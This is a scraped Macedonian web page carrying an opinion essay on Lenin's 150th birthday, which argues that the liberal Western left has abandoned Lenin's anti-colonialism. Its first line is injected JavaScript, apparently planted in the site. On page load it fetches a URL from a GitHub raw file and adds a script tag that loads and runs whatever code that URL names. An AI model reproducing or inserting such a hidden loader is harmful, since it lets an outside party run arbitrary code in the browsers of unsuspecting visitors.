;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); 150 години од раѓањето на Ленин - Антропол
АктуелноБиблиотекаИнтернационално

150 години од раѓањето на Ленин

Денес, 22 април 2020, се одбележуваат 150 години од раѓањето на Ленин, лидерот на Руската Револуција. Еден од корените на колапсот на eвропската „левица“ и нејзиното либерализирање може да се лоцира токму во запоставувањето на Ленин, а особено неговиот фокус врз анти-колонијализмот како клучен столб на антикапиталистичката мисла и борба. Имено, Ленин објаснува дека империјализмот е доба на глобализирање на капиталот, кој се карактеризира со концентрација на богатството во многу мал број луѓе преку создавање на олигополи, неприкосновени монополи и трустови (картели) на капиталот.  

Преку Болшевичката револуција не само што се поттикнува мирот помеѓу народите, туку и преку нејзиниот принцип на самоопределување на народите се охрабруваат и народно-ослободителните движења ширум светот.  Токму Ленин инсистираше дека револуциите за национални ослободувања во колонизираните земји се неодделиви од борбите против капиталот во колонијалните земји. Според тоа, Марксистичка-Ленинистичка позиција е само онаа која ја согледува потребата од дезинтеграција на глобалниот колонијален комплекс како предуслов за создавањето на радикално нов општествен систем. Всушност, колапсот на западниот марксизам и  неговото „либерализирање“, влече корени од неспособноста да ја согледа борбата помеѓу колонијализмот и анти-колонијализмот (предводен од Комунистичките партии) и потценувањето на неверојатниот успех кој во 20 век беше постигнат на ова поле. 

Во оваа насока, еден од најдобрите познавачи на Ленин, Доменико Лосурдо коментира: „Доколку сакаме да направиме разлика помеѓу „Десницата“ и „Левицата“, треба да обратиме внимание на два големи проблеми. Прво, нивната позиција во однос на неолибералните мерки и уништувањето на социјалната држава.  Како второ, треба да се согледа нивната позиција во однос на ризикот од светска војна или неоколонијална војна, како војните против Либија, Ирак, Југославија и Сирија. Ова се нео-колонијални војни. Доколку некоја партија (или група) ги брани овие војни, таа не може да се нарекува ,левичарска’, таа припаѓа на десницата“

Ваквата дезориентирана и некомплетна „либерална левица“ се претвора во алат со кој оперира токму нео-колонијализмот. Оттаму причината зошто нејзе не ја интересира воениот-империјалистички комплекс. Или, пак, тоа што 90% од светските ресурси се контролирани од 1% од населението; се’ додека пропорционален број на идентитетски групи (по етничка, родова и сексуална припадност) се застапени во тој 1%. Ваквата левица, преокупирана со прашања поврзани со супер-структурата (културата) и вгнездена во удобните столчиња по факултетите и институтите, целосно е одделена анти-колонијалната борба, и од самиот пролетеријат, а на крај и од мислата и делото на Ленин. Впрочем, на тоа се должи и нејзиниот неуспех, таа е жртва на сопствената неспособност да се соочи со потребата од изградба на држава која е способна ги издржи притисоците на империјализмот.  Токму затоа, ваквата „левица“, која смета дека патот до социјализмот е можен само преку класната борба, е импотентно и внатрешно распаднато зомби, која може да се придвижува единствено на команда на империјализмот. 

Онаа левица која се’ уште е длабоко вкоренета во марксизмот-ленинизмот, не страда од илузии дека социјалистичката револуција може да се случи преку ноќ, свесна за постапките и околностите таа одговорно стреми да освои моќ, а потоа да се консолидира преку изградбата на држава која е способна да се одбрани од нападот на империјалистичката контра-револуција.